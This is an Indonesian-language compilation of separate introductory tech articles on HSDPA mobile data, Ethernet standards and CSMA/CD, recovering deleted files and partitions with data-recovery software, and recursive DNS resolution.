HSDPA merupakan pengembangan dari jaringan W-CDMA yang sudah ada. Sebagai informasi, W-CDMA adalah nama teknologi GSM yang memungkinkan adanya teknologi 3G. Tujuan HSDPA, tak lain, adalah untuk meningkatkan kecepatan maksimal transfer data, kualitas pelayanan, dan efisiensi.HSDPA memungkinkan adanya layanan video streaming, Internet akses yang cepat, dan konferensi video. Lho, bukannya 3G saja sudah bisa? Memang bisa, tapi 3G biasa cuma berkecepatan 384 Kb/detiks. Nah, HSDPA memungkinkan kecepatan data maksimal 14 Mb/detik. Wow, kan? Dalam kondisi prima, kecepatan HSDPA lebih baik ketimbang koneksi internet kabel alias DSL (Digital Subscriber Line).
Kecepatan yang seperti itu membuat HSDPA menjadi teknologi tercepat di antara seluruh teknologi jaringan bergerak (mobile).
Dengan kecepatan yang demikian, mudah-mudahan, nonton televisi di ponsel, telepon video, akses Internet, dan layanan data lainnya bisa berjalan dengan mulus. Layanan lain pun bisa dirasakan lebih nikmat. Pelanggan bisa memperoleh waktu respons lebih singkat, menunggu lebih sebentar, dan menikmati kecepatan koneksi yang tinggi. Mereka menggunakan ponsel mereka untuk menelepon dan pada saat yang sama, mereka bisa mengunduh data.
Kecepatan HSDPA bisa meningkat karena pemindahan fungsi pemrosesan lebih dekat ke “udara”. Proses yang dipindahkan adalah proses penjadwalan jaringan dan retransmisi. Semula, kedua proses itu berjalan di pengendali jaringan radio. HSDPA juga menambah sebuah mekanisme pembagian kanal. Dengan perubahan-perubahan itu, HSDPA mengingkatkan kapasitas jaringan.
Operator juga tidak perlu mengeluarkan biaya investasi yang besar untuk menghadirkan HSDPA untuk pelanggannya. Dengan sedikit memodifikasi perangkat keras W-CDMA, HSDPA sudah bisa diaplikasikan. Selain itu, HSDPA menggunakan lebar kanal 5 MHz yang merupakan kanal yang juga digunakan jaringan W-CDMA. Dengan demikian, para operator sudah bisa menggunakan infrastruktur yang sudah ada—tak perlu lagi kanal khusus.
Sistem bisa dimodifikasi lebih lanjut untuk meningkatkan layanan bagi para pelanggan yang mengakses layanan 3,5G dengan ponsel 3G terkini. Namun, pengembangan itu harus diperhatikan agar tidak mengganggu pelanggan yang masih mengandalkan ponsel lawas yang sekadar telepon dan berkirim pesan singkat.
HSDPA diprediksi bakal menjadi teknologi yang menopang dunia telekomunikasi pada tahun 2007. Artinya, operator bisa menawarkan roaming ke seluruh dunia dengan lancar dengan menggunakan infrastruktur yang sudah ada.

Ethernet

Selayang pandang
Versi awal Xerox Ethernet dikeluarkan pada tahun 1975 dan di desain untuk menyambungkan 100 komputer pada kecepatan 2,94 megabit per detik melalui kabel sepanjang satu kilometer.
Disain tersebut menjadi sedemikian sukses di masa itu sehingga Xerox, Intel dan Digital Equipment Corporation (DEC) mengeluarkan standar Ethernet 10Mbps yang banyak digunakan pada jaringan komputer saat ini. Selain itu, terdepat standar Ethernet dengan kecepatan 100Mbps yang dikenal sebagai Fast Ethernet.
Asal Ethernet bermula dari sebuah pengembangan WAN di University of Hawaii pada akhir tahun 1960 yang dikenal dengan naman "ALOHA". Universitas tersebut memiliki daerah geografis kampus yang luas dan berkeinginan untuk menghubungkan komputer-komputer yang tersebar di kampus tersebut menjadi sebuah jaringan komputer kampus.
Proses standardisasi teknologi Ethernet akhirnya disetujui pada tahun 1985 oleh Institute of Electrical and Electronics Engineers (IEEE), dengan sebuah standar yang dikenal dengan Project 802. Standar IEEE selanjutnya diadopsi oleh International Organization for Standardization (ISO), sehingga menjadikannya sebuah standar internasional dan mendunia yang ditujukan untuk membentuk jaringan komputer. Karena kesederhanaan dan keandalannya, Ethernet pun dapat bertahan hingga saat ini, dan bahkan menjadi arsitektur jaringan yang paling banyak digunakan.
Jenis-jenis Ethernet
Jika dilihat dari kecepatannya, Ethernet terbagi menjadi empat jenis, yakni sebagai berikut:
10 Mbit/detik, yang sering disebut sebagai Ethernet saja (standar yang digunakan: 10Base2, 10Base5, 10BaseT, 10BaseF)
100 Mbit/detik, yang sering disebut sebagai Fast Ethernet (standar yang digunakan: 100BaseFX, 100BaseT, 100BaseT4, 100BaseTX)
1000 Mbit/detik atau 1 Gbit/detik, yang sering disebut sebagai Gigabit Ethernet (standar yang digunakan: 1000BaseCX, 1000BaseLX, 1000BaseSX, 1000BaseT).
10000 Mbit/detik atau 10 Gbit/detik. Standar ini belum banyak diimplementasikan.
Kecepatan
Standar
Spesifikasi IEEE
Nama
10 Mbit/detik
10Base2, 10Base5, 10BaseF, 10BaseT
IEEE 802.3
Ethernet
100 Mbit/detik
100BaseFX, 100BaseT, 100BaseT4, 100BaseTX
IEEE 802.3u
Fast Ethernet
1000 Mbit/detik
1000BaseCX, 1000BaseLX, 1000BaseSX, 1000BaseT
IEEE 802.3z
Gigabit Ethernet
10000 Mbit/detik



Cara kerja
Spesifikasi Ethernet mendefinisikan fungsi-fungsi yang terjadi pada lapisan fisik dan lapisan data-link dalam model referensi jaringan tujuh lapis OSI, dan cara pembuatan paket data ke dalam frame sebelum ditransmisikan di atas kabel.
Ethernet merupakan sebuah teknologi jaringan yang menggunakan metode transmisi Baseband yang mengirim sinyalnya secara serial 1 bit pada satu waktu. Ethernet beroperasi dalam modus half-duplex, yang berarti setiap station dapat menerima atau mengirim data tapi tidak dapat melakukan keduanya secara sekaligus. Fast Ethernet serta Gigabit Ethernet dapat bekerja dalam modus full-duplex atau half-duplex.
Ethernet menggunakan metode kontrol akses media Carrier Sense Multiple Access with Collision Detection untuk menentukan station mana yang dapat mentransmisikan data pada waktu tertentu melalui media yang digunakan. Dalam jaringan yang menggunakan teknologi Ethernet, setiap komputer akan "mendengar" terlebih dahulu sebelum "berbicara", artinya mereka akan melihat kondisi jaringan apakah tidak ada komputer lain yang sedang mentransmisikan data. Jika tidak ada komputer yang sedang mentransmisikan data, maka setiap komputer yang mau mengirimkan data dapat mencoba untuk mengambil alih jaringan untuk mentransmisikan sinyal. Sehingga, dapat dikatakan bahwa jaringan yang menggunakan teknologi Ethernet adalah jaringan yang dibuat berdasrkan basis First-Come, First-Served, daripada melimpahkan kontrol sinyal kepada Master Station seperti dalam teknologi jaringan lainnya.
Jika dua station hendak mencoba untuk mentransmisikan data pada waktu yang sama, maka kemungkinan akan terjadi collision (kolisi/tabrakan), yang akan mengakibatkan dua station tersebut menghentikan transmisi data, sebelum akhirnya mencoba untuk mengirimkannya lagi pada interval waktu yang acak (yang diukur dengan satuan milidetik). Semakin banyak station dalam sebuah jaringan Ethernet, akan mengakibatkan jumlah kolisi yang semakin besar pula dan kinerja jaringan pun akan menjadi buruk. Kinerja Ethernet yang seharusnya 10 Mbit/detik, jika dalam jaringan terpasang 100 node, umumnya hanya menghasilkan kinerja yang berkisar antara 40% hingga 55% dari bandwidth yang diharapkan (10 Mbit/detik). Salah satu cara untuk menghadapi masalah ini adalah dengan menggunakan Switch Ethernet untuk melakukan segmentasi terhadap jaringan Ethernet ke dalam beberapa collision domain.
Frame Ethernet
Ethernet mentransmisikan data melalui kabel jaringan dalam bentuk paket-paket data yang disebut dengan Ethernet Frame. Sebuah Ethernet frame memiliki ukuran minimum 64 byte, dan maksimum 1518 byte dengan 18 byte di antaranya digunakan sebagai informasi mengenai alamat sumber, alamat tujuan, protokol jaringan yang digunakan, dan beberapa informasi lainnya yang disimpan dalam header serta trailer (footer). Dengan kata lain, maksimum jumlah data yang dapat ditransmisikan (payload) dalam satu buah frame adalah 1500 byte.
Ethernet menggunakan beberapa metode untuk melakukan enkapsulasi paket data menjadi Ethernet frame, yakni sebagai berikut:
Ethernet II (yang digunakan untuk TCP/IP)
Ethernet 802.3 (atau dikenal sebagai Raw 802.3 dalam sistem jaringan Novell, dan digunakan untuk berkomunikasi dengan Novell NetWare versi 3.11 atau yang sebelumnya)
Ethernet 802.2 (juga dikenal sebagai Ethernet 802.3/802.2 without Subnetwork Access Protocol, dan digunakan untuk konektivitas dengan Novell NetWare 3.12 dan selanjutnya)
Ethernet SNAP (juga dikenal sebagai Ethernet 802.3/802.2 with SNAP, dan dibuat sebagai kompatibilitas dengan sistem Macintosh yang menjalankan TCP/IP)
Sayangnya, setiap format frame Ethernet di atas tidak saling cocok/kompatibel satu dengan lainnya, sehingga menyulitkan instalasi jaringan yang bersifat heterogen. Untuk mengatasinya, lakukan konfigurasi terhadap protokol yang digunakan via sistem operasi.
Topologi
Ethernet dapat menggunakan topologi jaringan fisik apa saja (bisa berupa topologi bus, topologi ring, topologi star atau topologi mesh) serta jenis kabel yang digunakan (bisa berupa kabel koaksial (bisa berupa Thicknet atau Thinnet), kabel tembaga (kabel UTP atau kabel STP), atau kabel serat optik). Meskipun demikian, topologi star lebih disukai. Secara logis, semua jaringan Ethernet menggunakan topologi bus, sehingga satu node akan menaruh sebuah sinyal di atas bus dan sinyal tersebut akan mengalir ke semua node lainnya yang terhubung ke bus

Atasi Masalah Data di Harddisk

Anda mungkin pernah mengalami hal hal dibawah ini :

* Mendelete file penting secara tidak sengaja.
* Anda memiliki banyak nama letter drive dan secara tidak sengaja menghilangkan data dengan melakukan format pada sebuah drive letter bahkan menghapus partisi harddisk dan data anda hilang
* Atau anda lebih suka memasang seluruh harddisk baru dan yang sudah usang didalam sebuah computer. Biar kelihatan memiliki computer canggih dengan banyak harddisk.
* Virus melakukan penghapusan data termasuk data penting.
* Harddisk anda mengalami mulfunction, hal ini dapat terjadi bila storage didalam media sudah terlalu penuh dan harddisk mengalami crash.

Kita bahas kasus kasus paling konyol dilakukan pemakai computer

Mendelete file secara tidak sengaja: Ada kata pepatah sepandai pandainya tupai melompat, suatu ketika pasti akan jatuh. Mereka yang biasa biasa saja mengunakan computer, sangat jarang melakukan kesalahan ini. Karena lebih memilih berhati hati menempatkan file pada harddisk dan menjauhkan tombol Delete. Tetapi kasus ini malah terjadi ketika seseorang yang sangat mahir mengunakan computer. Terkadang malah mematikan peringatan pada sistem Windows karena dianggap menganggu. Komentarnya, kenapa harus diberikan warning jika ingin mendelete file atau directory, inikan sebuah pekerjaan rutin. Biasanya pemakai computer yang sudah ahli melakukan setup Windows dengan mematikan hal hal yang dianggap tidak perlu. Suatu ketika, ternyata file yang penting didalam sebuah directory terhapus secara tidak sengaja tanpa tanda peringatan awal

Memformat harddisk secara tidak sengaja : Kasus ini sebenarnya jarang terjadi bagi mereka yang menyusun data penting pada sebuah harddisk. Mereka yang sudah berpengalaman akan menempatkan sebuah data pada sebuah harddisk dengan drive letter tertentu. Misalnya menempatkan data penting pada harddisk pertama atau kedua. Ketika melakukan format, maka didalam hati sudah tertanam kebiasaan untuk memeriksa kembali dan memastikan drive letter yang akan diformat bukanlah drive letter atau harddisk yang berisikan data penting. Kesalahan ini sering terjadi karena turunnya konsentrasi seseorang ketika melihat nama drive letter serta partisi pada sebuah computer yang hendak dihapus atau diganti . Atau paling umum dan konyol adalah cursor mouse tergeser ke partisi yang tidak ingin diformat. Tidak percaya, nyatanya banyak kejadian seperti ini terjadi dengan memformat drive letter yang salah. Maklum sistem seperti Windows XP sangat memudahkan melakukan format harddisk

Menghilangkan partisi secara tidak sengaja : Pada sistem Windows XP sangat memudahkan seseorang melakukan format atau membuat partisi. Sedangkan untuk sistem Windows 98, partisi harus dibuat dengan sistem DOS. Sayangnya, hal yang mendasar untuk membuat partisi pada sistem Windows XP terkadang kurang dipahami. Dan secara tidak sengaja anda melakukan penghapusan pada partisi harddisk yang berisikan data penting. Sedangkan sistem Windows 98, kejadian partisi hilang karena pemakai computer lupa memindahkan option pilihan harddisk. Terlebih bila mengunakan 2 harddisk dengan kapasitas dan pembagian yang sama paling sering terjadi.

Menempatkan data pada harddisk usang : Memiliki 3-4 harddisk didalam sebuah computer mungkin kelihatan keren. Ada kebiasaan buruk bagi pemakai computer untuk tetap memanfaatkan harddisk usang. Tetapi kita harus mengetahui bahwa harddisk memiliki jangka pemakaian. Menempatkan data yang penting pada harddisk usang bukanlah hal bijaksana. Lebih baik melakukan backup atau setidaknya menempatkan data pada 2 harddisk berbeda untuk melakukan duplikat. Nyatanya banyak yang tidak memperhatikan umur dari pemakaian harddisk. Ketika harddisk tua mulai berulah seperti terjadi kerusakana fisik seperti bad sector atau harddisk mendadak tidak dapat di access barulah disadari masih ada data penting yang tertinggal didalam.

Bagi pemula sebaiknya mengenal arti Fisik Drive, Partisi dan Drive/Logical drive letter :

Dibawah ini dasar sederhana untuk mengenal sebuah drive storage

Fisik drive: Diartikan adalah bentuk storage. Bentuknya umum adalah harddisk, bentuk lainnya dapat berupa Flash drive, CD/DVD-ROM dengan media CD/DVD atau floppy drive dan lainnya. Fisik drive adalah bentuk fisik sebuah drive media penyimpan. Didalam drive nantinya dibagi menjadi beberapa partisi untuk membentuk nama drive atau dikenal sebagai drive letter

Partisi atau Partition : Diartikan pembagian sebuah storage untuk membagi atau memotong kapasitas sebuah media penyimpan atau storage menjadi bagian yang lebih kecil sesuai kebutuhan. Pembagian storage atau space atau isi kapasitas harddisk dapat diartikan sebagai partisi. Misalnya harddisk 100 GB dapat dipecah menjadi 2 dengan pembagian 50GB dan 50GB. Tetapi ada ketentuan pada susunan partisi khususnya harddisk. Pembagian ditentukan dengan Primary dan Extended partisi.

Harddisk pertama pada computer atau harddisk yang berisikan sistem booting akan diberikan nama Primary Partition atau partisi utama. Didalam Primary partisi hanya memiliki 1 drive letter, yaitu drive C.

Harddisk pertama dapat dibagi dan diberikan nama Extended Partition. Sebagai contoh anda memiliki harddisk 250GB dan membagi 2 partisi 20GB Primary dan 230GB Secondary. Maka 20GB pertama akan menjadi drive C. Sedangkan 230GB dapat dibagi lagi dengan beberapa nama drive letter yang anda butuhkan termasuk kapasitas dari masing masing drive letter. Proses pembagian Extended Partition diakhir dengan pemberian Logical drive. Misalnya anda membagi partisi Extended menjadi 5 drive letter (D-E-F-G-H) lagi dengan masing masing kapasitas 50GB, drive letter pertama memiliki letter D dan kedua menjadi drive E dan seterusnya.

Bila anda memiliki 2 harddisk, harddisk pertama harus memiliki ketentuan seperti diatas dan minimal memiliki primary partition. Sedangkan Extended Partition hanya diperlukan bila anda perlu membagi harddisk pertama, kedua dan seterusnya menjadikan beberapa drive letter lain. Bila tidak, maka harddisk pertama akan tetap berisikan Primary Partition dengan 1 drive letter saja yaitu C. Drive C dengan Primary Partition akan berisikan sistem boot pada sebuah sistem operasi.

Untuk harddisk kedua dapat dibagi tanpa Primary Partition dan dapat bagi langsung dengan Extented Partition. Cara pembagian sama seperti membagi kapasitas dari cara harddisk pertama tetapi untuk membentuk Extended Partition harus memiliki harddisk pertama dengan isi Primary Partition. Harddisk kedua dan seterusnya tidak memerlukan Primary Partition bila anda tidak memerlukan harddisk kedua dan seterusnya juga dapat melakukan boot pada sebuah computer.

Pada gambar dibawah ini adalah gambaran dari struktur pembagian sebuah storage dengan bentuk media harddisk. Sebagai contoh fisik harddisk yang digunakan adalah berkapasitas 250GB :

Primary Partition, Drive C, berisikan 20GB (19.53GB)

Extended Partition, Drive D - E - F dan seterusnya dibagi berdasarkan kebutuhan.

Melakukan recover data didalam harddisk (storage)

Sebelum hanya perusahaan software membuat software recovery harddisk. Kehilangan data dari sebuah harddisk adalah sebuah mimpi buruk

Tetapi sekarang ini adalah beberapa software yang mampu melakukan pengembalian data pada sebuah harddisk. Bila anda secara tidak sengaja menghilangkan data anda, contohnya partisi pada harddisk, logical drive yang terhapus atau harddisk secara tidak sengaja terhapus. Persiapkan langkah langkah seperti dibawah ini

* Cara yang terbaik adalah mengunakan 2 harddisk. Harddisk yang mengalami kerusakan, atau hilang data digunakan sebagai harddisk kedua. Sedangkan harddisk pertama digunakan sebagai sistem recovery dan melakukan backup data yang hilang.
* Bila anda memiliki 1 buah harddisk berisikan boot sistem dengan 1 partisi dengan Primary Partition. Langkah terbaik untuk tidak mengunakan harddisk tersebut untuk melakukan recover. Gunakan harddisk lain untuk melakukan recover dengan menginstal software recovery data. Upaya ini untuk mencegah data anda terhapus secara permanen.
* Bila anda memiliki beberapa drive letter misalnya C,D,E. Anda dapat mengunakan harddisk untuk melakukan recovery data. Dengan catatan tidak menginstall kegiatan penulisan pada drive letter yang berisi data penting dan telah terhapus secara tidak sengaja. Sebagai contoh, Data anda berada didalam drive letter E. Maka anda tidak boleh mengunakan Drive letter E untuk menginstall program apapun. Program recovery data dapat ditempatkan pada drive letter lain misalnya di D dan C.
* Bila secara tidak sengaja anda menghapus partisi harddisk anda. Anda tidak boleh mengunakan harddisk tersebut untuk melakukan install software apapun. Gunakan harddisk lain untuk mencari data anda didalam harddisk yang terhapus.
* Sekalipun harddisk anda telah kehilangan informasi atau harddisk anda mulai mengalami gangguan seperti bad sector. Sistem recovery data dapat melakukan pengembalian data anda. Asalkan harddisk masih dapat dikenal oleh harddisk pembantu untuk melakukan recovery
* Software recovery data hanya melakukan pengembalian data anda yang terhapus secara tidak sengaja. Tetapi tidak mengembalikan bentuk partisi anda seperti semula.

Undelete file / mengembalikan file terhapus

Undelete file atau mengembalikan file yang terhapus tidak terlalu sulit. Banyak software utiliti dengan menambahkan fitur undelete file.

Misalnya Tune-Up menyertakan fitur untuk mencari file atau directory yang terhapus pada sebuah drive letter. Atau dan Recover4All dengan kemampuan khusus untuk melakukan pencarian file yang terdelete. Software utility tersebut dapat mencari nama file yang telah terhapus, dan memilih apakah kondisi file yang terhapus masih baik atau utuh. Software undelete file membutuhkan input dari pemakai untuk mengembalikan nama file aslinya. Karena pada sistem WIndows, file yang dihapus akan dihapus karakter paling depan. Misalnya file anggaran.xls masih dapat ditemukan dengan nama ?nggaran.xls. Dan karakter awal harus dimasukan secara manual.

Mengembalikan data pada Partisi atau drive letter yang terhapus

Kami mencoba 2 buah software handal untuk melakukan recovery data. Kedua software dibawah ini mampu mengambil data dari sebuah storage yang telah hilang sampai tingkat logical drive atau drive letter maupun informasi pada partisi. Artinya, sebuah harddisk yang sudah dianggap tidak memiliki partisi (blank) lagi ternyata masih dapat dicari sisa data dari file yang ada didalam harddisk.

Kemampuan kedua program dibawah ini adalah :

* Mendukung FAT16, FAT32, VFAT, NTFS
* Recover file yang terhapus termasuk folder
* Mengembalian file yang hilang dari terhapusnya partisi bahkan yang terformat dengan sistem cepat / QUICK.
* Mengembalikan data dari storage yang tidak dapat di access lagi atau terjadinya corruption file dengan pencarian sector
* Mendukung multi disk format seperti IDE sampai SCSI
* Bekerja pada Sistem Windows 95 - XP dan 2003 untuk Stellar

Stellar Phoenix FAT & NTFS - Windows Data Recovery Software

GetDataBack for NTFS or FAT

Kedua software tersebut mampu mengambil data baik partisi dan drive letter yang telah anda hapus. Bahkan software recovery data akan mencoba mencari data anda walaupun harddisk atau storage media mengalami cacat fisik misalnya bad sector.

Kesimpulan

Kehilangan data baik terhapus secara tidak sengaja pada drive letter, directory dan partisi storage bukan sebuah mimpi buruk lagi. Dengan software Recovery Data, maka data anda masih dapat dikembalikan walaupun terdapat resiko tidak seluruhnya dapat diamankan. Bila anda mengalami kejadian ini, secepatnya anda mematikan computer dan melepaskan harddisk anda untuk melakukan recovery. Dan tidak disarankan melakukan recovery data pada harddisk yang sama kecuali anda mengenal betul apa yang anda lakukan. Mengenal cara kerja harddisk, dan media storage seperti jenis partisi, drive letter sangat disarankan agar mencegah kerusakan lebih dalam.

Teori bekerja DNS

Pengelola dari sistem DNS terdiri dari tiga komponen:
*'''DNS resolver''', sebuah program klien yang berjalan di komputer pengguna, yang membuat permintaan DNS dari program aplikasi.
*'''recursive DNS server''', yang melakukan pencarian melalui DNS sebagai tanggapan permintaan dari ''resolver'', dan mengembalikan jawaban kepada para ''resolver'' tersebut;
''dan'' ...
*'''authoritative DNS server''' yang memberikan jawaban terhadap permintaan dari ''recursor'', baik dalam bentuk sebuah jawaban, maupun dalam bentuk delegasi (misalkan: mereferensikan ke ''authoritative DNS server'' lainnya)

===Pengertian beberapa bagian dari nama domain===

Sebuah [[nama domain]] biasanya terdiri dari dua bagian atau lebih (secara teknis disebut ''label''), dipisahkan dengan titik.
*Label paling kanan menyatakan '''[[top-level domain]]''' - domain tingkat atas/tinggi (misalkan, alamat www.wikipedia.org memiliki top-level domain org).
*Setiap label di sebelah kirinya menyatakan sebuah sub-divisi atau '''subdomain''' dari domain yang lebih tinggi. Catatan: "subdomain" menyatakan ketergantungan relatif, bukan absolut. Contoh: wikipedia.org merupakan subdomain dari domain org, dan id.wikipedia.org dapat membentuk subdomain dari domain wikipedia.org (pada prakteknya, id.wikipedia.org sesungguhnya mewakili sebuah nama host - lihat dibawah). Secara teori, pembagian seperti ini dapat mencapai kedalaman 127 level, dan setiap label dapat terbentuk sampai dengan 63 karakter, selama total nama domain tidak melebihi panjang 255 karakter. Tetapi secara praktek, beberapa [[pendaftar nama domain]] (''domain name registry'') memiliki batas yang lebih sedikit.
*Terakhir, bagian paling kiri dari bagian nama domain (biasanya) menyatakan nama host. Sisa dari nama domain menyatakan cara untuk membangun jalur logis untuk informasi yang dibutuhkan; nama host adalah tujuan sebenarnya dari nama sistem yang dicari alamat IP-nya. Contoh: nama domain www.wikipedia.org memiliki nama host "www".

DNS memiliki kumpulan hirarki dari '''DNS servers'''. Setiap domain atau subdomain memiliki satu atau lebih '''authoritative DNS Servers''' (server DNS otorisatif) yang mempublikasikan informas tentang domain tersebut dan nama-nama server dari setiap domain di-"bawah"-nya. Pada puncak hirarki, terdapat '''[[root nameserverroot servers]]'''- induk server nama: server yang ditanyakan ketika mencari ('''menyelesaikan'''/''resolving'') dari sebuah nama domain tertinggi (''top-level domain'').


===Sebuah contoh dari teori rekursif DNS===

Sebuah contoh mungkin dapat memperjelas proses ini. Andaikan ada aplikasi yang memerlukan pencarian alamat IP dari www.wikipedia.org. Aplikasi tersebut bertanya ke ''DNS recursor'' lokal.
*Sebelum dimulai, ''recursor'' harus mengetahui dimana dapat menemukan ''root nameserver''; administrator dari ''recursive DNS server'' secara manual mengatur (dan melakukan update secara berkala) sebuah file dengan nama '''root hints [[DNS zonezone]]''' (panduan akar DNS) yang menyatakan alamat-alamt IP dari para server tersebut.
*Proses dimulai oleh ''recursor'' yang bertanya kepada para ''root server'' tersebut - misalkan: server dengan alamat IP "198.41.0.4" - pertanyaan "apakah alamat IP dari www.wikipedia.org?"
*''Root server'' menjawab dengan sebuah '''delegasi''', arti kasarnya: "Saya tidak tahu alamat IP dari www.wikipedia.org, tapi saya "tahu" bahwa server DNS di 204.74.112.1 memiliki informasi tentang domain org."
*''Recursor'' DNS lokal kemudian bertanya kepada server DNS (yaitu: 204.74.112.1) pertanyaan yang sama seperti yang diberikan kepada ''root server''. "apa alamat IP dari www.wikipedia.org?". (umumnya) akan didapatkan jawaban yang sejenis, "saya tidak tahu alamat dari www.wikipedia.org, tapi saya "tahu" bahwa server 207.142.131.234 memiliki informasi dari domain wikipedia.org."
*Akhirnya, pertanyaan beralih kepada server DNS ketiga (207.142.131.234), yang menjawab dengan alamat IP yang dibutuhkan.
Proses ini menggunakan [[pencarian rekursif]] (''recursion / recursive searching'').

===Pengertian pendaftaran domain dan ''glue records''===
Membaca contoh diatas, Anda mungkin bertanya: "bagaimana caranya DNS server 204.74.112.1 tahu alamat IP mana yang diberikan untuk domain wikipedia.org?" Pada awal proses, kita mencatad bahwa sebuah ''DNS recursor'' memiliki alamat IP dari para ''root server'' yang (kurang-lbeih) di data secara explisit (''hard coded''). Mirip dengan hal tersebut, server nama (''name server'') yang otoritatif untuk 'top-level domain'' mengalami perubahan yang jarang.

Namun, server nama yang memberikan jabawan otorisatif bagi nama domain yang umum mengalami perubahan yang cukup sering. Sebagai bagian dari proses pendaftara sebuah nama domain (dan beberapa waktu sesudahnya), pendaftar memberikan pendaftaran dengan server nama yang akan mengotorisasikan nama domain tersebut; maka ketika mendaftara wikipedia.org, domain tersebut terhubung dengan server nama gunther.bomis.com dan zwinger.wikipedia.org di pendaftar .org. Kemudian, dari contoh di atas, ketika server dikenali sebagai 204.74.112.1 menerima sebuah permintaan, DNS server memindai daftar domain yang ada, mencari wikipedia.org, dan mengembalikan server nama yang terhubung dengan domain tersebut.